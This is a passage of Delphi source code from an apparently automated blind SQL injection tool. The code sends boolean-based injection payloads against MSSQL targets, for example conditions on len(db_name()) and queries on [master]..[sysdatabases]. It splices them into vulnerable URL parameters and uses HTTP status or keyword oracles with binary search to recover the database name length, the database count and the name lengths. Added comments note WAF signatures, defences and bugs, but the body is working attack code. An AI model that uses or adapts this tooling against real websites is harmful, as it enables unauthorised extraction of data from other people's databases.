end;
//******************************************************************************
//暴力破解的函数
// Boolean-based blind probe for the length of the current database name.
// Sends one request whose injected condition asks "len(db_name()) < max_num" and
// derives the yes/no answer from the HTTP response (see the two oracles below).
// Returns true when the response indicates the condition held, false otherwise.
//   max_num  - upper bound to test against
//   str_url  - base URL the probe is appended to
//   iPos, sContent, btype - unused here: the per-character variant that read iPos
//                           is commented out below, and btype is never examined
// Defender's note: every request carries the literal fragment
// "select len(db_name())" followed by a comparison whose bound changes on each call;
// that fragment is a stable signature for WAF/IDS rules, and the request pattern
// (many near-identical requests differing only in the numeric bound) is visible to
// rate limiting. Parameterized queries on the target remove the injection point.
function DBNamelenA(max_num:integer;str_url:string;iPos:integer;sContent:string;btype:integer):boolean;
var
str_ext:string;
URL:string;
content:string;// fetched page body (keyword oracle only)
icode:integer; // HTTP status code (status oracle only)
label start;
begin
//*****************
result:=false;
//case btype of
//1: begin
// The condition that is injected; only the numeric bound varies between calls.
str_ext:=' and (select len(db_name()))<'+inttostr(max_num);
// Inject_methord (unit-level setting, defined elsewhere) decides how the condition is
// spliced into the vulnerable parameter: 1 appends it as-is (numeric context);
// 2 and 3 first close an open quote and re-balance it afterwards, 3 additionally
// with a '%' - presumably for a LIKE pattern; confirm against the caller.
case CJdatabase_unit.Inject_methord of
0 :
begin
Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;// result stays false
end;
1 :
URL:=str_ext;
2 :
URL:=''' '+str_ext+' and ''''=''';
3 :
URL:='%'' '+str_ext+' and ''%''=''';
end;
// end;
{2: begin
str_ext:=' and (select unicode(substring(db_name(),'+inttostr(iPos)+',1)))<'+inttostr(max_num);
case CJdatabase_unit.Inject_methord of
0 :
begin
Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:=''' '+str_ext+' and ''''=''';
3 :
URL:='%'' '+str_ext+' and ''%''=''';
end;
end;
end; }
//*****************
// Opaque helper from define_unit; presumably URL/hex-encodes the payload - not visible here.
URL:=define_unit.SQLINJECTIONUrlToHex(URL,0);
// Oracle 1 (keyword mode): "true" iff the keyword from the main form occurs in the body.
if Form_main.CheckBox_keyword.Checked=true then
begin
content:=define_unit.GetURLContent(str_url+URL);
if pos(trim(Form_main.Edit_keyword.Text),content)>0 then
result:=true
else
result:=false;
end
else
// Oracle 2 (status mode): HTTP 200 means true, HTTP 500 means false.
begin
start:
icode:=define_unit.GetURLCode(str_url+URL);
if icode=200 then
result:=true
else
begin
if icode= 500 then
result:=false
else
begin
//sleep(1000);
// Any other status (e.g. 403, 429, 503, or whatever GetURLCode returns on a
// timeout) re-sends the identical request at once: no delay and no attempt cap,
// so this branch can spin indefinitely.
goto start;
end;
end;
end;
end;
//******************************************************************************
//暴力破解用的函数,获得用户字符串的长度
// Determines the length of the current database name by repeated DBNamelenA probes:
// a binary search over [1,32] narrows the bounds to a width of at most 2, then a
// linear scan finds the first bound i for which "length < i" holds and returns i-1.
//   str_url  - base URL passed through to DBNamelenA
//   sContent - passed through unchanged (DBNamelenA does not use it)
// Returns 0 when no probe in the final scan answers true (e.g. length >= 32, or the
// oracle never reports true). str_ext is declared but never used.
function GetDBNameCharLen(str_url:string;sContent:string):integer;
var
str_ext:string;
middle,min_num,max_num:integer;
i:integer;
begin
min_num:=1;
max_num:=32;
result:=0;
// (Originally: first make sure a valid page can be fetched from the injection URL.)
{if sContent='' then
begin
Application.MessageBox(pchar('从注入地址不能获得有效的页面,无法猜解表的长度,退出'),pchar('提示'),mb_ok+mb_iconinformation);
exit;
end ;}
//***********************
// Phase 1: narrow the [min_num,max_num] range. The for-loop only caps the number of
// iterations; the range itself is adjusted in the body and the loop exits via break.
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if DBNamelenA(middle,str_url,0,sContent,1) then // length < middle: lower the upper bound
begin
max_num:=middle;
end
else // length >= middle: raise the lower bound
begin
min_num:=middle;
end;
end;
// Phase 2: scan the remaining bounds; the first i with "length < i" gives length i-1.
for i:=min_num+1 to max_num do
begin
if DBNamelenA(i,str_url,0,sContent,1) then
begin
result:=i-1;
break;
end;
end ;
end;
//******************************************************************************
//暴力破解用的函数
// Same binary-search-then-scan procedure as GetDBNameCharLen, but with the initial
// bounds supplied by the caller and btype=2 passed to DBNamelenA.
//   min_num, max_num - initial search bounds (value parameters, narrowed locally)
//   iPos             - character position intended for the btype=2 probe
//   URL              - base URL; sContent is passed through unchanged
// NOTE(review): DBNamelenA ignores btype and iPos (its per-character case is commented
// out), so as written this probes len(db_name()) again rather than the character at
// iPos. Returns 0 if no probe in the final scan answers true.
function DBNameCharLenB(min_num,max_num:integer;iPos:integer;URL:string;sContent:string):integer;
var
i:integer;
middle:integer;
begin
result:=0;
// Narrow the range; the for-loop only caps the iteration count (exit is via break).
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if DBNamelenA(middle,URL,iPos,sContent,2) then // value < middle: lower the upper bound
begin
max_num:=middle;
end
else // value >= middle: raise the lower bound
begin
min_num:=middle;
end;
end;
// Scan the remaining bounds; the first i with "value < i" gives i-1.
for i:=min_num+1 to max_num do
begin
if DBNamelenA(i,URL,iPos,sContent,2) then
begin
result:=i-1;
break;
end;
end ;
end;
//*****************************************************************************
//*****************************************************************************
// Determines how many databases the server lists in [master]..[sysdatabases] via
// DBCountA(btype=1) probes: binary search over [1,128] down to a width of 2, then a
// linear scan; the first bound i for which "count < i" holds yields count i-1.
//   URL      - base URL passed through to DBCountA
//   sContent - passed through unchanged (DBCountA does not use it)
// Returns 0 when no probe in the final scan answers true. str_ext is unused.
function GetDBCount(URL:string;sContent:string):integer;
var
str_ext:string;
middle,i,min_num,max_num:integer;
begin
min_num:=1;
max_num:=128;
result:=0;
// (Originally: first make sure a valid page can be fetched from the injection URL.)
{if sContent='' then
begin
Application.MessageBox(pchar('从注入地址不能获得有效的页面,无法猜解表的长度,退出'),pchar('提示'),mb_ok+mb_iconinformation);
exit;
end ; }
//***************************
// Phase 1: narrow the range for the database count. The for-loop only caps the
// number of iterations; the bounds are adjusted in the body and the loop exits via break.
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if DBCountA(middle,0,0,URL,sContent,1) then // count < middle: lower the upper bound
begin
max_num:=middle;
end
else // count >= middle: raise the lower bound
begin
min_num:=middle;
end;
end;
// Phase 2: scan the remaining bounds; the first i with "count < i" gives i-1.
for i:=min_num+1 to max_num do
begin
if DBCountA(i,0,0,URL,sContent,1) then
begin
result:=i-1;
break;
end;
end;
end;
//*****************************************************************************
// Boolean-based blind probe against [master]..[sysdatabases]. Builds one injected
// condition of the form "<expression> < max_num", sends a single request and reads the
// yes/no answer from the response. Returns true when the condition appears to hold.
//   max_num - upper bound to test against
//   iTop    - which database (by dbid order) the btype=2 probe refers to
//   iPos    - only referenced by the commented-out btype=3 variant
//   str_url - base URL the probe is appended to
//   sContent - unused
//   btype   - 1: number of databases; 2: length of the name of the selected database;
//             any other value assigns no probe (the btype=3 case is commented out),
//             so the request goes out with whatever URL holds at that point.
// Defender's note: the fragments "count(1) from [master]..[sysdatabases]" and
// "len(name) from (Select top ... dbid,name from [master]..[sysdatabases]" are
// constant across calls and are natural WAF/IDS signatures; the only varying part
// is the numeric bound. Least privilege on the application's database login
// (no access to master..sysdatabases) blunts this even where the injection exists.
function DBCountA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer):boolean;
var
str_ext:string;
URL:string;
icode:integer;  // HTTP status code (status oracle only)
content:string; // fetched page body (keyword oracle only)
label start;
begin
//*****************
result:=false;
case btype of
1: begin
// Probe: number of rows in sysdatabases is below max_num.
str_ext:=' and (select count(1) from [master]..[sysdatabases])<'+inttostr(max_num);
// Inject_methord (unit-level setting) picks the splice style: 1 raw, 2 quote-balanced,
// 3 quote-balanced with a '%' (presumably a LIKE context; confirm against the caller).
case CJdatabase_unit.Inject_methord of
0 :
begin
//Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;// silent: the warning is commented out, result stays false
end;
1 :
URL:=str_ext;
2 :
URL:=''' '+str_ext+' and ''''=''';
3 :
URL:='%'' '+str_ext+' and ''%''=''';
end;
end;
2: begin
// Probe: the name length of the iTop-th database (top iTop by dbid, then highest dbid)
// is below max_num.
str_ext:=' and (Select top 1 len(name) from (Select top '+inttostr(iTop)+' dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <'+inttostr(max_num);
case CJdatabase_unit.Inject_methord of
0 :
begin
//Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;// silent: the warning is commented out, result stays false
end;
1 :
URL:=str_ext;
2 :
URL:=''' '+str_ext+' and ''''=''';
3 :
URL:='%'' '+str_ext+' and ''%''=''';
end;
end;
{3: begin
str_ext:=' and (Select top 1 unicode(substring(name,'+inttostr(iPos)+',1)) from (Select top '+inttostr(iTop)+' dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <'+inttostr(max_num);
case CJdatabase_unit.Inject_methord of
0 :
begin
Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:=''' '+str_ext+' and ''''=''';
3 :
URL:='%'' '+str_ext+' and ''%''=''';
end;
end; }
end;
//*****************
// Opaque helper from define_unit; presumably URL/hex-encodes the payload - not visible here.
URL:=define_unit.SQLINJECTIONUrlToHex(URL,0);
// Oracle 1 (keyword mode): "true" iff the keyword from the main form occurs in the body.
if Form_main.CheckBox_keyword.Checked=true then
begin
content:=define_unit.GetURLContent(str_url+URL);
if pos(trim(Form_main.Edit_keyword.Text),content)>0 then
result:=true
else
result:=false;
end
else
// Oracle 2 (status mode): HTTP 200 means true, HTTP 500 means false.
begin
start:
icode:=define_unit.GetURLCode(str_url+URL);
if icode=200 then
result:=true
else
begin
if icode= 500 then
result:=false
else
begin
//sleep(1000);
// Any other status re-sends the identical request immediately, with no delay and
// no attempt cap - this branch can spin indefinitely (same as DBNamelenA).
goto start;
end;
end;
end;
end;
//*****************************************************************************
// Determines the name length of one database via DBCountA(btype=2) probes: binary
// search over [1,64] down to a width of 2, then a linear scan; the first bound i for
// which "length < i" holds yields length i-1.
//   iTop     - which database (by dbid order) to examine; forwarded to DBCountA
//   iPos     - forwarded to DBCountA, which does not use it for btype=2
//   str_url  - base URL; sContent is forwarded unchanged
// Returns 0 when no probe in the final scan answers true (e.g. length >= 64).
function GetDBCharLen(iTop,iPos:integer;str_url:string;sContent:string):integer;
var
min_num,max_num:integer;
middle,i:integer;
begin
min_num:=1;
max_num:=64;
result:=0;
// (Originally: first make sure a valid page can be fetched from the injection URL.)
{if sContent='' then
begin
Application.MessageBox(pchar('从注入地址不能获得有效的页面,无法猜解表的长度,退出'),pchar('提示'),mb_ok+mb_iconinformation);
exit;
end ;}
//***************************
// Phase 1: narrow the range for the name length (the original comment said "database
// count"; the btype=2 probe measures len(name)). The for-loop only caps the iteration
// count; the bounds are adjusted in the body and the loop exits via break.
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if DBCountA(middle,iTop,iPos,str_url,sContent,2) then // length < middle: lower the upper bound
begin
max_num:=middle;
end
else // length >= middle: raise the lower bound
begin
min_num:=middle;
end;
end;
// Phase 2: scan the remaining bounds; the first i with "length < i" gives i-1.
for i:=min_num+1 to max_num do
begin
if DBCountA(i,iTop,iPos,str_url,sContent,2) then
begin
result:=i-1;
break;
end;
end;
end;
//*****************************************************************************
//暴力破解用的函数
// Same search procedure as GetDBCharLen with caller-supplied bounds and btype=3.
//   min_num, max_num - initial search bounds (value parameters, narrowed locally)
//   iTop, iPos       - forwarded to DBCountA
//   URL              - base URL; sContent is forwarded unchanged
// NOTE(review): unlike its siblings (DBNameCharLenB, GetDBCount) this function never
// sets result before the loops, so when no probe in the final scan answers true the
// return value is whatever the function result happened to hold. Also, btype=3 is
// commented out inside DBCountA, so that probe currently assigns no condition.
function DBCharLenB(min_num,max_num:integer;iTop,iPos:integer;URL:string;sContent:string):integer;
var
i:integer;
middle:integer;
begin
// Narrow the range; the for-loop only caps the iteration count (exit is via break).
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if DBCountA(middle,iTop,iPos,URL,sContent,3) then // value < middle: lower the upper bound
begin
max_num:=middle;
end
else // value >= middle: raise the lower bound
begin
min_num:=middle;
end;
end;
// Scan the remaining bounds; the first i with "value < i" gives i-1.
for i:=min_num+1 to max_num do
begin
if DBCountA(i,iTop,iPos,URL,sContent,3) then
begin
result:=i-1;
break;
end;
end ;
end;
//*****************************************************************************
//暴力破解用的函数
function ColumnA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer;tableName:string):boolean;
var
str_ext:string;
URL:string;
content:string;
icode:integer;
label start;
begin
//*****************
result:=false;
case btype of
1: begin
str_ext:='%20and%20(select%20top%201%20len(name)%20from%20(%20select%20top%20'+intto